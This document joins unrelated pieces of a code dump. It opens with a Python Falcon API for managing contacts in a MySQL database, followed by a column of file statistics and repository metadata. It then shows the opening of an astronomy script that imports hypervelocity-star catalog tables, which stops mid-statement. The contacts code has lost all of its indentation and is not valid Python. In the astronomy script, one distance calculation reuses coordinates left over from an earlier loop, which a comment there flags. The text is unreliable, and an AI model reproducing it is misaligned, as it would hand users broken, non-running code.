query = (" SELECT id, name, uuid, "
" email, phone, description "
" FROM tbl_contacts "
" ORDER BY name ")
cursor.execute(query)
rows = cursor.fetchall()
cursor.close()
cnx.disconnect()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
meta_result = {"id": row[0],
"name": row[1],
"uuid": row[2],
"email": row[3],
"phone": row[4],
"description": row[5]}
result.append(meta_result)
resp.body = json.dumps(result)
@staticmethod
def on_post(req, resp):
"""Handles POST requests"""
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=str(ex))
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_USER_NAME')
name = str.strip(new_values['data']['name'])
if 'email' not in new_values['data'].keys() or \
not isinstance(new_values['data']['email'], str) or \
len(str.strip(new_values['data']['email'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EMAIL')
email = str.lower(str.strip(new_values['data']['email']))
match = re.match(r'^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$', email)
if match is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EMAIL')
if 'phone' not in new_values['data'].keys() or \
not isinstance(new_values['data']['phone'], str) or \
len(str.strip(new_values['data']['phone'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_USER_PHONE')
phone = str.strip(new_values['data']['phone'])
if 'description' in new_values['data'].keys() and \
new_values['data']['description'] is not None and \
len(str(new_values['data']['description'])) > 0:
description = str.strip(new_values['data']['description'])
else:
description = None
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_contacts "
" WHERE name = %s ", (name,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.CONTACT_NAME_IS_ALREADY_IN_USE')
add_row = (" INSERT INTO tbl_contacts "
" (name, uuid, email, phone, description) "
" VALUES (%s, %s, %s, %s, %s) ")
cursor.execute(add_row, (name,
str(uuid.uuid4()),
email,
phone,
description))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/contacts/' + str(new_id)
class ContactItem:
@staticmethod
def __init__():
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONTACT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
query = (" SELECT id, name, uuid, email, phone, description "
" FROM tbl_contacts "
" WHERE id = %s ")
cursor.execute(query, (id_,))
row = cursor.fetchone()
cursor.close()
cnx.disconnect()
if row is None:
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.CONTACT_NOT_FOUND')
result = {"id": row[0],
"name": row[1],
"uuid": row[2],
"email": row[3],
"phone": row[4],
"description": row[5]}
resp.body = json.dumps(result)
@staticmethod
def on_delete(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONTACT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_contacts "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.CONTACT_NOT_FOUND')
# check relation with shopfloors
cursor.execute(" SELECT id "
" FROM tbl_shopfloors "
" WHERE contact_id = %s ", (id_,))
rows_shopfloors = cursor.fetchall()
if rows_shopfloors is not None and len(rows_shopfloors) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_SHOPFLOORS')
# check relation with spaces
cursor.execute(" SELECT id "
" FROM tbl_spaces "
" WHERE contact_id = %s ", (id_,))
rows_spaces = cursor.fetchall()
if rows_spaces is not None and len(rows_spaces) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_SPACES')
# check relation with stores
cursor.execute(" SELECT id "
" FROM tbl_stores "
" WHERE contact_id = %s ", (id_,))
rows_stores = cursor.fetchall()
if rows_stores is not None and len(rows_stores) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_STORES')
# check relation with tenants
cursor.execute(" SELECT id "
" FROM tbl_tenants "
" WHERE contact_id = %s ", (id_,))
rows_tenants = cursor.fetchall()
if rows_tenants is not None and len(rows_tenants) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_TENANTS')
cursor.execute(" DELETE FROM tbl_contacts WHERE id = %s ", (id_,))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
@staticmethod
def on_put(req, resp, id_):
"""Handles PUT requests"""
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=str(ex))
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
                                   description='API.INVALID_CONTACT_ID')
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONTACT_NAME')
name = str.strip(new_values['data']['name'])
if 'email' not in new_values['data'].keys() or \
not isinstance(new_values['data']['email'], str) or \
len(str.strip(new_values['data']['email'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EMAIL')
email = str.lower(str.strip(new_values['data']['email']))
match = re.match(r'^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$', email)
if match is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EMAIL')
if 'phone' not in new_values['data'].keys() or \
not isinstance(new_values['data']['phone'], str) or \
len(str.strip(new_values['data']['phone'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_USER_PHONE')
phone = str.strip(new_values['data']['phone'])
if 'description' in new_values['data'].keys() and \
new_values['data']['description'] is not None and \
len(str(new_values['data']['description'])) > 0:
description = str.strip(new_values['data']['description'])
else:
description = None
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_contacts "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.CONTACT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_contacts "
" WHERE name = %s AND id != %s ", (name, id_))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.CONTACT_NAME_IS_ALREADY_IN_USE')
update_row = (" UPDATE tbl_contacts "
" SET name = %s, email = %s, "
" phone = %s, description = %s "
" WHERE id = %s ")
cursor.execute(update_row, (name,
email,
phone,
description,
id_,))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_200
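# Wiring sketch, not from this module: expose the two resources through
# falcon's router (the route paths are assumptions; use falcon.API()
# instead of falcon.App() on falcon < 3).
app = falcon.App()
app.add_route('/contacts', ContactCollection())
app.add_route('/contacts/{id_}', ContactItem())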
| 39.178344
| 105
| 0.506747
| 1,302
| 12,302
| 4.619048
| 0.106759
| 0.050881
| 0.069172
| 0.095111
| 0.846026
| 0.828234
| 0.778517
| 0.773695
| 0.760392
| 0.760392
| 0
| 0.017034
| 0.370102
| 12,302
| 313
| 106
| 39.303514
| 0.759066
| 0.012681
| 0
| 0.733333
| 0
| 0.007843
| 0.179458
| 0.044432
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035294
| false
| 0.007843
| 0.023529
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7167b7e85f2a5ffc0c767902d4be8be1c97f67ef
| 46,657
|
py
|
Python
|
tasks/ascii.py
|
DouglasBoubert/hypervelocity
|
17d2c91902fe0c1ea7b35cde65f41a44c85d6201
|
[
"MIT"
] | 2
|
2021-02-14T23:01:19.000Z
|
2021-02-15T08:39:55.000Z
|
tasks/ascii.py
|
DouglasBoubert/hypervelocity
|
17d2c91902fe0c1ea7b35cde65f41a44c85d6201
|
[
"MIT"
] | null | null | null |
tasks/ascii.py
|
DouglasBoubert/hypervelocity
|
17d2c91902fe0c1ea7b35cde65f41a44c85d6201
|
[
"MIT"
] | 1
|
2018-02-25T16:27:20.000Z
|
2018-02-25T16:27:20.000Z
|
# -*- coding: utf-8 -*-
"""ASCII datafiles.
Often produced from LaTeX tables in the original papers,
but sometimes provided as supplementary datafiles on the journal webpages.
"""
import csv
import os
import re
from datetime import datetime
from decimal import Decimal
from glob import glob
from astrocats.catalog.photometry import PHOTOMETRY, set_pd_mag_from_counts
from astrocats.catalog.utils import (is_number, jd_to_mjd, make_date_string,
pbar, pbar_strings)
from astropy import units as u
from astropy.coordinates import SkyCoord as coord
from astropy.io.ascii import read
from astropy.time import Time as astrotime
from ..faststars import FASTSTARS
from ..utils import rgc_to_dhel
def do_ascii(catalog):
"""Process ASCII files extracted from datatables of published works."""
task_str = catalog.get_current_task_str()
# catalog.journal_entries()
# return
#def holding():
# 2007ApJ...660..311B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'ApJ_660_311_table1.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = 'SDSS'+str(row['SDSS'])
name, source = catalog.new_entry(oname, bibcode='2007ApJ...660..311B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Margaret J. Geller, Scott J. Kenyon, Michael J. Kurtz, Benjamin C. Bromley', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2007), source)
gallon = float(str(row['Glon']))
gallat = float(str(row['Glat']))
radec = oname.strip('SDSSJ')
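        # rebuild 'HHMMSS.ss±DDMMSS.s' into space-separated sexagesimal fields for SkyCoord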
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhelio']), source=source)
galrad_MS = float(str(row['Ra']))
galrad_BHB = float(str(row['Rb']))
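        # rgc_to_dhel: galactocentric radius -> heliocentric distance along (gallon, gallat)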
dhel_MS = rgc_to_dhel(galrad_MS,gallon,gallat)
dhel_BHB = rgc_to_dhel(galrad_BHB,gallon,gallat)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel_MS), u_value='kpc', source=source,derived=True)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel_BHB), u_value='kpc', source=source,derived=True)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, str(row['Sp']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "bhb", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "g", source=source)
catalog.journal_entries()
# 2009ApJ...690.1639B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj292642t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = row['Catalog']
name, source = catalog.new_entry(oname, bibcode='2009ApJ...690.1639B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Margaret J. Geller, Scott J. Kenyon', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2009), source)
gallon = float(str(row['Glon']))
gallat = float(str(row['Glat']))
if (oname!='US708') & (oname!='HE0437-5439'):
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
if str(row['e_Vhel'])!='NA':
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
else:
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), source=source)
galrad = float(str(row['RGC']))
dhel = rgc_to_dhel(galrad,gallon,gallat)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel), u_value='kpc', source=source,derived=True)
sptype = str(row['Type']).split('/')
for SPTYPE in sptype:
if SPTYPE == "sdO":
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "O", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "sd", source=source)
elif SPTYPE == "BHB":
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "bhb", source=source)
else:
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, SPTYPE, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
if str(row['ID'])[:3]=='HVS':
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, row['ID'], source=source)
catalog.journal_entries()
# 2012ApJ...744L..24L
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apjl415156t1t2.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
name, source = catalog.new_entry(oname, bibcode='2012ApJ...744L..24L')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Yinbi Li, Ali Luo, Gang Zhao, Youjun Lu, Juanjuan Ren, Fang Zuo', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2012), source)
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, row['ID'], source=source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "F", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.journal_entries()
# 2012ApJ...751...55B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj427101t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).replace(' ','')
name, source = catalog.new_entry(oname, bibcode='2012ApJ...751...55B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Margaret J. Geller, Scott J. Kenyon', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2012), source)
if name == 'SDSSJ112359.47+751807.73':
sourcewarren = catalog.entries[name].add_source(name='Warren R. Brown (private comm.)',secondary=True)
catalog.entries[name].add_quantity(FASTSTARS.SPECTRAL_TYPE, 'B9', source=sourcewarren)
gallon = float(str(row['Glon']))
gallat = float(str(row['Glat']))
if (oname!='US708') & (oname!='HE0437-5439'):
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
if str(row['e_Vhel'])!='NA':
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
else:
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), source=source)
galrad = float(str(row['RGC']))
dhel = rgc_to_dhel(galrad,gallon,gallat)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel), u_value='kpc', source=source, derived=True)
sptype = str(row['Type']).split('/')
for SPTYPE in sptype:
if SPTYPE != "NA":
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, SPTYPE, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
if str(row['ID'])[:3]=='HVS':
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, row['ID'], source=source)
catalog.journal_entries()
# 2014ApJ...780....7P
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj485719t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = 'SDSS'+str(row['Catalog']).replace(' ','')
name, source = catalog.new_entry(oname, bibcode='2014ApJ...780....7P')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Lauren E. Palladino, Katharine J. Schlesinger, Kelly Holley-Bockelmann, Carlos Allende Prieto, Timothy C. Beers, Young Sun Lee, Donald P. Schneider', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, 'Pal'+str(row['Pal']), source=source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "G", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "K", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.journal_entries()
# 2014ApJ...787...89B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj494602t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).replace(' ','')
name, source = catalog.new_entry(oname, bibcode='2014ApJ...787...89B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Margaret J. Geller, Scott J. Kenyon', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:19]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
if FASTSTARS.SPECTRAL_TYPE not in catalog.entries[name]:
sourceboubert = catalog.entries[name].add_source(bibcode='2018arXiv180410179B',secondary=True)
catalog.entries[name].add_quantity(FASTSTARS.SPECTRAL_TYPE, 'A', source=sourceboubert)
catalog.entries[name].add_quantity(FASTSTARS.SPECTRAL_TYPE, 'B', source=sourceboubert)
galrad = float(str(row['RGC']))
errgalrad = float(str(row['e_RGC']))
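        # gallon/gallat still hold values from the previous table's loop; they are not set per-row here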
dhel = rgc_to_dhel(galrad,gallon,gallat)
dhel_lo = rgc_to_dhel(galrad-errgalrad,gallon,gallat)
dhel_hi = rgc_to_dhel(galrad+errgalrad,gallon,gallat)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel), e_lower_value=dhel-dhel_lo, e_upper_value=dhel_hi-dhel, u_value='kpc', source=source, derived=True)
if str(row['ID'])!='pBHVS':
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, 'HVS'+str(row['ID']), source=source)
if str(row['ID'])=='22':
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "B", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "bhb", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "g", source=source)
elif str(row['ID'])=='23':
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "B", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "bhb", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "g", source=source)
elif str(row['ID'])=='24':
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "B", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.journal_entries()
# 2014EAS....67..255Z
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'1501.07824.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['ID'])
name, source = catalog.new_entry(oname, bibcode='2014EAS....67..255Z')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER, 'Y. Q. Zhang, M. C. Smith, J. L. Carlin', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
        radeg = float(str(row['ra']))    # numeric degrees: u.deg multiplication needs a float, not a str
        decdeg = float(str(row['dec']))
ra, dec = coord(ra=radeg*u.deg, dec=decdeg*u.deg).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), u_value='kpc', source=source) # This distance may have some metallicity dependent uncertainty?
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'K', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'M', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2014ApJ...789L...2Z
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apjl496832t1t2t3_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['ID'])
name, source = catalog.new_entry(oname, bibcode='2014ApJ...789L...2Z')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Jing Zhong, Li Chen, Chao Liu, Richard de Grijs, Jinliang Hou, Shiyin Shen, Zhengyi Shao, Jing Li, Ali Luo, Jianrong Shi, Haotong Zhang, Ming Yang, Licai Deng, Ge Jin, Yong Zhang, Yonghui Hou, Zhenchao Zhang', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, str(row['Catalog']), source=source)
radec = str(row['Catalog']).strip('J')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vrb']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), u_value='kpc', source=source) # This distance may have some metallicity dependent uncertainty?
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, str(row['Type']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2014ApJ...794..146T
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'ApJ794146.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).replace(' ','')
name, source = catalog.new_entry(oname, bibcode='2014ApJ...794..146T')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Christopher A. Theissen, Andrew A. West', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, str(row['Type']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2014ApJ...794..145S
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj501503t8_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
oname = oname[:4]+'J'+oname[4:]
name, source = catalog.new_entry(oname, bibcode='2014ApJ...794..145S')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
